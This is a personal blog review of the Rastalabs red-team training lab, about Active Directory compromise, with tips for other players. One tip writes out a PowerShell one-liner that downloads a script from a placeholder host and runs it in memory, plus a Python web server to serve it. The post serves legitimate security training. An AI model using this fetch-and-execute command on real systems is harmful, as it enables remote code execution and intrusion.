/ Rastalabs

700 hours of pain and a beer-can sandwich

A Rastlabs story.

So probably like many people, I'd only heard good things about Rastalabs before I picked it up. Sure, people said it was hard, but how bad could it be? I had this.

Boy was I in for a shock.

I picked up one month of Rastalabs for July of 2018. I timed it perfectly so that it started nicely on a Friday afternoon, and finished one month later on a Sunday afternoon. I settled down, cracked my fingers, and set about pwning this motherflipper.

Fast-forward to two days later and I've barely left my seat. It's Sunday night and I'm still desperately trying to find something, anything to give me my initial foothold. I've spent hours and hours poring over the same bits of information, trying to figure out where I was going wrong. Glancing over things one last time before bed, an idea struck me! Five minutes later I'm in. Relief floods over me, a whole weekend down but at least I have something to show for it.

The rest of the month continued in much the same manner. I quickly picked up a few more flags once I was in which gave me a confidence boost, and one by one the others fell, but I did little else for a month besides eat, sleep, work and Rastalabs (as my better half will tell you!).

In the end, one month was literally just enough time to get the flags. In fact, I cut it so close, that even though I still had lab access, the HTB website was no longer accepting flags for me and was saying my time had expired! I quickly created a support ticket however, and the stellar support team had it sorted within a few hours, even on a Sunday!

Once I was done I didn't know what to do with myself. What do you do when something you've been so focused on for so long comes to an end? Ah, of course. A Sunday lunch bacon sandwich!


I was already a member of Hackthebox and the NetSecFocus Mattermost chat server, but I joined the #Rastalabs channel so I could share my pain with other, similarly woeful individuals.

Rastamouse seemed to be ever present and ready to help - I honestly don't know he does it. He seems to have infinite patience, quickly resetting any servers, solving problems and answering questions and somehow staying sane and good-natured through it all.

The lab itself is VPN access, in the way that anyone who has done OSCP or HTB before will be familiar with, and consists of several segregated networks. You land in the 'external' network representing the internet, and have to make your away across a variety of hosts and networks to the ultimate final goal of Domain Admin.

This isn't a simple land-and-fire-up-responder exercise, nor can you rely on frameworks like Metasploit or Empire to get the job done. You have to get familiar with the underlying tools, start to understand Active Directory and what it is in the environment you're specifically looking for. This is great, as anyone can land on a box and fire off a few Metasploit modules, what this lab is teaching you to do is get to grips with the domain and properly start to figure things out for yourself. It's the OSCP equivalent for Windows Domain compromisation.

The only real gripe I had was with some of the other users. This is a redteaming simulation lab, and yet some of them would be dropping binaries and files all over the box, leaving flags or passwords or information in the clear for others to find without clearing up and so on. As the domain is so interconnected, with scripted users performing actions and users with agents and processes all over the place individual boxes can't be reset, only the whole lab, so when users do this it can cause problems for others that follow.

All-in-all it was an incredible experience, as these challenges often are. I learnt a lot, like a lot a lot, and think Rastamouse and the Hackthebox team have done a fantastic job with this lab. At £90 for the month this lab is an absolute bargain and I cannot recommend it enough. I'll be getting another month after a bit of break, so that I can try the exercises again without focusing on the flags. I want to try different tools, and to do it quicker and quieter.


For anyone looking to take on the lab, or who currently are, here are my thoughts and tips:

  • This is not a beginner friendly lab. It is however, a great intermediate lab for anyone looking to hone their skills, particularly relating to domain compromisation and Active Directory attacks.
  • Get familiar with PowerShell and PowerView. Not just the Empire modules, read the docs and learn how to pipe PowerShell commands to each other so you can filter them and narrow down on your targets.
  • Enumerate, enumerate, enumerate. Anytime you get a piece of information, start over. If you compromise a new user on a new box, enumerate the box. Enumerate old boxes with the new user. Enumerate the user's AD permissions. Enumerate it all, and build up a picture and understanding of what's going on.
  • Don't assume something won't work or won't be a vector just because it's a lab. There are scripted users doing all sorts of actions across the domain.
  • Check out harmj0y's blog (one of the creator's of Empire/PowerSploit) as well as Rastmouse's blog itself. There's lots of quality content that will definitely prove useful.
  • Deepen your understanding of Active Directory. A good resource for this is adsecurity.
  • Treat it like a redteam. Don't drop files willy-nilly and restart boxes or kill processes to see if something worked. Try and keep things in memory, do things quietly and efficiently.
  • iex(new-object net.webclient).downloadstring("http://myip/APowerShellScript.ps1") <3 python -m SimpleHTTPServer 8080
  • Respect your lab partners. Clean up after yourself. If you have to drop files, keep them isolated and delete them as soon as you're done.
  • Don't be afraid to ask questions. For most, this is a learning experience, and a damn good one. And if people seem smug, it's always obvious once you know the answer.
  • Try Harder.